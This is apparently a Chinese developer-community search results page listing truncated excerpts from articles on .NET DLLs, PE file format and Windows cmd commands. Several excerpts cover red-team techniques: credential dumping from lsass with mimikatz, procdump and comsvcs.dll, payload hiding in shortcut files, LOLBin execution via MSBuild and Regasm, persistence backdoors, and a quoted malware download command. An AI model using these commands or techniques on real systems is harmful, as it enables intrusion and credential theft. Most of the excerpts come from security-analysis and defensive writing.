我可以在.NET中从无管理的.dll或.exe中读取文件属性吗_我可以在.NET中创建一个常规的Windows DLL(用于插件)吗？_我可以使用.Net标准库中的PowerShell类在.Net框架项目(exe)中使用吗？ - 腾讯云开发者社区 - 腾讯云

开发者社区

文档建议反馈控制台

最新优惠活动

文章/答案/技术大牛

发布

我可以在不source脚本的情况下将变量从Bash脚本导出到环境中吗

echo $VAR 有没有一种方法可以通过只执行 export.bash 而不 source 它获取 $VAR？答：不可以。但是有几种可能的解决办法。...最明显的方法，你已经提到过，是使用 source 或 ....在调用 shell 的上下文中执行脚本: $ cat set-vars1.sh export FOO=BAR $ . set-vars1.sh $ echo $FOO BAR 另一种方法是在脚本中打印设置环境变量的命令.../set-vars2.sh)" $ echo "$FOO" BAR 在终端上执行 help export 可以查看 Bash 内置命令 export 的帮助文档： # help export export...help eval 相关阅读：用和不用export定义变量的区别在shell编程中$(cmd) 和 `cmd` 之间有什么区别 ----

1352 0

PE文件格式详解,第二讲,NT头文件格式,以及文件头格式

首先看下我们的标准PE格式的二进制.(使用Winhex,或者010 Editor都可以) ? 可以看出,生成的时候默认会为我们生成.const常量区,那么我们可以让它和代码区合并吗?...//机器型号,作用是区别这个exe是哪个CPU可以跑的.重要....在这里需要注意的是可选头大小,文件属性,以及机器型号. 其余的自己看看. 1.机器型号: 机器型号,在PE中的定义,在VC++6.0中已经给出了....这个地方是我计算偏移得出,根据结构体的类型大小,可以自己计算偏移得出....可以看出,可选头的大小是0x00E0 大小,换算成10进制就可以知道,E0是224字节大小,所以根据这个,可以计算出可选头大小 3.文件属性 文件属性紧跟在E0 00 后面,它是0F 01 文件属性是按照位来的

7236 0

您找到你想要的搜索结果了吗？

是的

没有找到

Windows常用命令一览表

系统下运行DOS，中文版Windows XP 中的命令提示符进一步提高了与DOS 下操作命令的兼容性，用户可以在命令提示符直接输入中文调用文件。...开始－>运行－>键入cmd或command(在命令行里可以看到系统版本、文件系统版本) help #命令帮助 cls #清屏补充说明： manager：n.处理者，经理，管理人; 干事，理事; management...dfrg.msc——-磁盘碎片整理程序 chkdsk.exe—–Chkdsk磁盘检查 devmgmt.msc—设备管理器 regsvr32/u*.dll—-停止dll文件运行 rononce-p—-15...F4显示“我的电脑”和“Windows资源管理器”中的“地址”栏列表。 Shift+F10显示所选项的快捷菜单。 Alt+空格键显示当前窗口的“系统”菜单。...左箭头键打开左边的下一菜单或者关闭子菜单。 F5刷新当前窗口。 BackSpace在“我的电脑”或“Windows资源管理器”中查看上一层文件夹。 Esc取消当前任务。

1K1 0

Windows常用命令一览表

，所以一般Windows 的各种版本都与其兼容，用户可以在Windows 系统下运行DOS，中文版Windows XP 中的命令提示符进一步提高了与DOS 下操作命令的兼容性，用户可以在命令提示符直接输入中文调用文件...calc———–启动计算器 dfrg.msc——-磁盘碎片整理程序 chkdsk.exe—–Chkdsk磁盘检查 devmgmt.msc—设备管理器 regsvr32/u*.dll—-停止dll文件运行...Ctrl+F4在允许同时打开多个文档的程序中关闭当前文档。 Alt+Tab在打开的项目之间切换。 Alt+Esc以项目打开的顺序循环切换。 F6在窗口或桌面上循环切换屏幕元素。...F4显示“我的电脑”和“Windows资源管理器”中的“地址”栏列表。 Shift+F10显示所选项的快捷菜单。 Alt+空格键显示当前窗口的“系统”菜单。...左箭头键打开左边的下一菜单或者关闭子菜单。 F5刷新当前窗口。 BackSpace在“我的电脑”或“Windows资源管理器”中查看上一层文件夹。 Esc取消当前任务。

2.5K3 2

Windows、Linux系统常用CMD命令大全

AT 计划在计算机上运行的命令和程序。 ATTRIB 显示或更改文件属性。 BREAK 设置或清除扩展式 CTRL+C 检查。 CACLS 显示或修改文件的访问控制列表(ACLs)。...FC 比较两个或两套文件，并显示不同处。 FIND 在文件中搜索文字字符串。 FINDSTR 在文件中搜索字符串。 FOR 为一套文件中的每个文件运行一个指定的命令。...FTYPE 显示或修改用于文件扩展名关联的文件类型。 GOTO 将 Windows 命令解释程序指向批处理程序中某个标明的行。...-------磁盘碎片整理程序 chkdsk.exe-----Chkdsk磁盘检查 devmgmt.msc--- 设备管理器 regsvr32 /u *.dll----停止dll文件运行 drwtsn32.../u *.dll----停止dll文件运行 regsvr32 /u zipfldr.dll------取消ZIP支持 cmd.exe--------CMD命令提示符 chkdsk.exe--

2.1K3 0

Windows 权限提升

，但当时解决了这两个问题：它可以由普通用户通过RPC触发，甚至可以选择要加载的DLL的名称，只要他在System32文件夹中，它将有服务加载。...] - 从SYSVOL中获取密码域渗透——利用SYSVOL还原组策略中保存的密码先说下如何复现，在域控的组策略管理gpmc.msc（我这里用的默认策略）中设置一条添加用户和组的策略： ?...最初UAC在Windows Vista上出现的时候只有两个设置：始终通知：安装软件和更改我的计算机或更改了Windows设置通知我（启用UAC）从不通知：安装软件和更改我的计算机或更改了Windows...，你可以会奇怪这不是很正常吗？...，我希望各位了解管理员用户是入俄在启用UAC之后如何获取High完整性的（包含在access tokens中)。

3.5K2 0

渗透测试与开发技巧

通过c#编写dll & 通过rundll32.exe或者regsvr32加载dll 默认情况下，c#不可以声明导出函数，但可通过添加UnmanagedExports实现当然，通过c#编写的dll，dll...在域渗透时要记得留意域内主机的本地管理员账号如果管理员疏忽，域内主机使用相同的本地管理员账号，可以通过pass-the-hash远程登录域内其他主机参考：《域渗透——Local Administrator...快捷方式的参数隐藏技巧将payload放置在260个空字符之后，这样无法在文件属性查看payload，可以用来在快捷方式中隐藏payload，欺骗用户点击，隐蔽执行代码参考：《渗透技巧——快捷方式文件的参数隐藏技巧...参考: 《利用BDF向DLL文件植入后门》方法18：特殊注册表键值在注册表启动项创建特殊名称的注册表键值，用户正常情况下无法读取(使用Win32 API)，但系统能够执行(使用Native API...，文件属性多了"快捷方式" 使用/J不需要管理员权限使用/D需要管理员权限应用：更改释放文件的路径 ---- Tips 51 powershell在执行脚本时传入参数 powershell -executionpolicy

4.2K2 0

cmd命令【实施工程师技能】

path 查看一下是否配置成功以上是网络连通性以及环境变量常用到的操作，下面是我将【cmd】命令做了个汇总，有需要可以【Ctrl+F】进行搜索即可。...：显示内存使用情况（如果直接运行无效，可以先管理员身份运行命令提示符，在命令提示符里输入mem.exe>d:a.txt 即可打开d盘查看a.txt，里面的就是内存使用情况了。...attrib [参数][源文件或目录] 文件属性操作命令，attrib命令可以列出或修改磁盘上文件的属性，文件属性包括文档（A）、只读(R)、隐藏(H)、系统(S)，例如：attrib -h -r -s...中存放的对应位置的值,用以清除AWARD BIOS密码.debug 还可以破解硬盘保护卡等,但只可以在纯DOS下用。...if 在批处理程序中执行条件处理（更多说明见if命令及变量）　　goto 标签将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签）　　call

7052 0

Quantum 构建工具使用新的 TTP 投递 Agent Tesla

Zscaler 的研究人员发现暗网上正在出售名为 Quantum Builder 的构建工具，该工具可以投递 .NET 远控木马 Agent Tesla。...执行后 LNK 文件会运行混淆的PowerShell代码，经过base64解编码与异或解密得到执行命令 IEX mshta https[:]//filebin.net/njqyvfot61w0tu9a/...，如下所示：【恶意 INF 文件作为参数执行 CMSTP】在 cmstp.exe 安装 INF 文件时，RunPreSetupCommandsSection 参数中的命令将以管理权限执行。...【触发 UAC 绕过】当以恶意 INF 作为参数生成 cmstp.exe 时，就会以管理权限执行恶意软件，如下所示：【UAC 绕过并以管理权限执行】 Agent Tesla 的 C&C 服务器被配置为...如果 Payload 的扩展名为 .dll，则它使用 rundll32.exe 将 DLL 加载到虚拟内存中。

1.5K2 0

c语言基础学习02_windows系统下的cmd命令

：显示内存使用情况（如果直接运行无效，可以先管理员身份运行命令提示符，在命令提示符里输入mem.exe>d:a.txt 即可打开d盘查看a.txt，里面的就是内存使用情况了。...attrib [参数][源文件或目录] 文件属性操作命令，attrib命令可以列出或修改磁盘上文件的属性，文件属性包括文档（A）、只读(R)、隐藏(H)、系统(S)，例如：attrib -h -r -s...中存放的对应位置的值,用以清除AWARD BIOS密码.debug 还可以破解硬盘保护卡等,但只可以在纯DOS下用。...if 在批处理程序中执行条件处理（更多说明见if命令及变量）　　goto 标签将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签）　　call...for 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量）　　echo on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置　　echo 信息在屏幕上显示出信息

1.3K2 1

详解Windows Shim的攻防利用

Shim的本意是垫圈或垫片。理论上说，任何的计算机问题都可以新增一层逻辑来解决。Shim也是这么一个垫在应用程序和windowsAPI之间的逻辑层。...比如下图，当我运行test.exe的时候，用processmonitor可以看见系统读取了sysmain.sdb这个文件。 ? Shim 数据库包含了大约5000多条记录。...该缓存放在内存中，所以我们可以用Volatility的shimcachemem插件来取出信息。如下图所示。 ? 安全分析人员在病毒取证的时候往往需要知道最近在该系统上执行过哪些程序。...在这个时候我们可以查看注册表里的Shim缓存影像。Win7在关闭或重启的时候会把Shim缓存序列化到注册表的以下位置。...我们可以用ShimCacheParser.py 来读取该信息。值得注意的是由于windows只有在关闭或重启的时候才会序列化Shim缓存，所以此处是上一次windows运行时的Shim缓存。 ?

2.4K7 0

cmd命令详解

：显示内存使用情况（如果直接运行无效，可以先管理员身份运行命令提示符，在命令提示符里输入mem.exe>d:a.txt 即可打开d盘查看a.txt，里面的就是内存使用情况了。...attrib [参数][源文件或目录] 文件属性操作命令，attrib命令可以列出或修改磁盘上文件的属性，文件属性包括文档（A）、只读(R)、隐藏(H)、系统(S)，例如：attrib -h -r -s...中存放的对应位置的值,用以清除AWARD BIOS密码.debug 还可以破解硬盘保护卡等,但只可以在纯DOS下用。...if 在批处理程序中执行条件处理（更多说明见if命令及变量）　　goto 标签将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签）　　call...cacls 文件名查看文件的访问用户权限列表　　REM 文本内容在批处理文件中添加注解　　netsh 查看或更改本地网络配置情况

2.1K2 0

一个自称 lpk.dll 的病毒分析

该样本将自己命名为 lpk.dll，与系统 lpk.dll 同名，在程序需要使用 lpk.dll 时，便会遭到该样本的劫持。...接下来恶意代码会查找可以感染的逻辑磁盘，并创建线程进行感染，判断是否为目录，若是，则遍历目录进行感染；判断是否是 exe 文件，若是，则复制自身到当前目录下；判断是否为压缩文件，若是，则将自身添加到压缩文件中...服务函数会创建 hra%u.dll 将 lpk.dll 写入此文件，会访问 http://204.72.210.221/admin.html 并读取网页源代码，提取网页源代码中的域名，并进行连接，接收指令并执行...5、若当前加载的文件不是 lpk.dll，则扫描电脑上所有可以感染的逻辑磁盘，若可以感染，则创建线程进行感染。 ? 6、搜索磁盘中的文件，判断是否为特殊文件或是目录。...7、若磁盘中的文件不是目录，则获取文件扩展名，判断是否有 exe 文件，若有，则将 lpk.dll 复制过去，并设置文件属性为隐藏。 ?

2.9K2 0

红队技巧-白加黑

适用条件:.NET Framework>=4.0 第一步找到Msbuild.exe 默认情况下Msbuild.exe是没有在系统环境变量中，所以需要我们先找到，默认情况下Msbuild.exe是在....这里要下载nps_payload工具可以生成xml或hta的文件，msbuild都可以执行，且自带的免杀挺有效的。...2.3 白名单Regasm.exe Regasm 为程序集注册工具，读取程序集中的元数据，并将所需的项添加到注册表中，从而使COM客户端可以透明地创建.NET Framework类。...：加载并注册程序集生成、注册类型库并将其安装到指定的 COM+ 1.0 应用程序中配置以编程方式添加到类的服务和前面一样在.net目录下生成dll python3 GreatSCT.py -...Cmstp安装或删除“连接管理器”服务配置文件。

2.2K2 0

windows10 CMD 命令大全

ATTRIB 显示或更改文件属性。 BREAK 设置或清除扩展式 CTRL+C 检查。 CACLS 显示或修改文件的访问控制列表(ACLs)。...FC 比较两个或两套文件，并显示不同处。 FIND 在文件中搜索文字字符串。 FINDSTR 在文件中搜索字符串。...FTYPE 显示或修改用于文件扩展名关联的文件类型。 GOTO 将 Windows 命令解释程序指向批处理程序中某个标明的行。...TIME 显示或设置系统时间。 TITLE 设置CMD.EXE会话的窗口标题。 TREE 以图形模式显示驱动器或路径的目录结构。...-p 15秒关机 rsop.msc 组策略结果集 rundll32.exe rundll32.exe %Systemroot%System32shimgvw.dll,ImageView_Fullscreen

1.8K2 0

PE文件和COFF文件格式分析——签名、COFF文件头和可选文件头1

Characteristics字段用于标记该文件属性，notepad.exe该字段值为0x010F。...但是我发现notepad.exe、Kernel32.dll、User32.dll等都设置了该标志。而一般我们编译的PE文件是不设置该项的。...但是我发现notepad.exe、Kernel32.dll、User32.dll等都设置了该标志。而一般我们编译的PE文件是不设置该项的。...我的xp系统上DLL和Exe文件基本都设置了该标志。 IMAGE_FILE_DEBUG_STRIPPED 0x0200 调试信息已经从该映像文件中移除。...所以即使某个DLL文件的后缀名改了，你可以结合这个“特征码”来还原其真面目。这儿我还要说一个认知的误区。

1.1K4 0

OCX制作CAB,数字签名制作

，signcode.exe 下面我具体说如何使用他们来帮助我们制作需要的cab包。...将ocx文件以及第三方dll文件打包成cab文件： Internet 软件分发单位是“软件包”，它由包含.INF文件或软件分发.OSD文件（或两者都包括）的.CAB文件所组成。...一个分发单位也可以包含软件组件，如 ActiveX 控件(.OCX)、.DLL文件、.EXE文件、Java类文件或小程序。...对CAB文件进行数字签名传说中数字签名之后就可以不出现提示而自动下载，所以也试试：在\Microsoft Visual Studio .NET 2003\SDK\v1.1\Bin 中间有三个小工具...文件属性->数字证书->详细信息-〉查看证书-〉安装证书，进入安装证书向导，存放区域选择“受信任的根证书颁发机构”，点击完成即可。思想就是如上所示，具体的不懂的可以从网上查相关资料。

1.3K2 0

.NET牛人应该知道些什么,我的回答

我相信一个真正优秀的ASP.NET（及WinForm）开发人员应该不仅仅会拖放控件到设计器中，也应该掌握更多的东西。一个优秀的赛车比赛选手很了解他自己的坐驾，他知道哪些可以做？哪些不能做？...（EXE是可以执行的程序，DLL是动态链接库，是用于被EXE或其他DLL调用的，用于提供程序接口）什么是强类型，什么是弱类型？哪种更好些？为什么?...（全局程序集缓存，在整个操作系统中缓存一些程序集，其他引用该程序集的程序就不需要将这些程序集拷贝到EXE运行的目录了。）...在调试中它应该放在哪里？（调试文件，PDB文件和对应的EXE，DLL文件在同一个文件夹）什么叫圈复杂度（cyclomatic complexity）？为什么它很重要？...[ThreadStatic]属性在ASP.NET中有用吗？它有没有副作用？是好是坏？

3681 0

红队技巧-导出凭据和密码

前言红队中各种抓取密码凭据的方法，文末彩蛋，内附工具链接，以及我制作的过360的minikatz的版本，各位请享用，最近筹备重新开blog，记录学习计划，不然知识我学完立马就忘了，与大家一起学习！...::Minidump lsassdump.dmp sekurlsa::logonPasswords 如果对lsass.exe敏感的话，那么还可以配合lsass.exe的pid来使用更香： procdump...前提：需要管理员及以上权限，版本限制（仅支持Windows XP，2003，Vista，7、2008和Windows 8）命令： wce.exe -o file.txt wec.exe 3.comsvcs.dll...前提：在powershell中运行，管理员权限以上命令： C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump...不知道是不是我刚更新没有关网络，把我64位的搞死了，但是32位的依然坚挺！然后接着保险起见，加壳工具包里面有我编译好的一些工具，懂得都懂嗷，不会的百度。 ?

2.2K1 0

权限维持方法小结

，由于该子键的值中可使用逗号分隔开多个程序，因此，在键值的数值中可加入其它程序。...无需管理员权限的后门，并能够劫持所有.Net程序。...CLR能够劫持系统中全部.net程序，需要设置环境变量，可以图形化界面操作，也可以使用WMI（通过WMI修改环境变量需要系统重启或注销重新登录才能生效）。...5、系统软件（1）wmi WMI（Windows Management Instrumentation）即 Windows 管理规范，由一组强大的工具集合组成，用于管理本地或远程的 Windows...插入的恶意代码可以是将登录成功的用户密码发送到远程服务器或者记录到某个log文件中。在openssh目录中找到includes.h文件。

3K1 0

点击加载更多

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云

扫码加入开发者社群

相关资讯

热门标签

活动推荐

运营活动

活动名称

广告关闭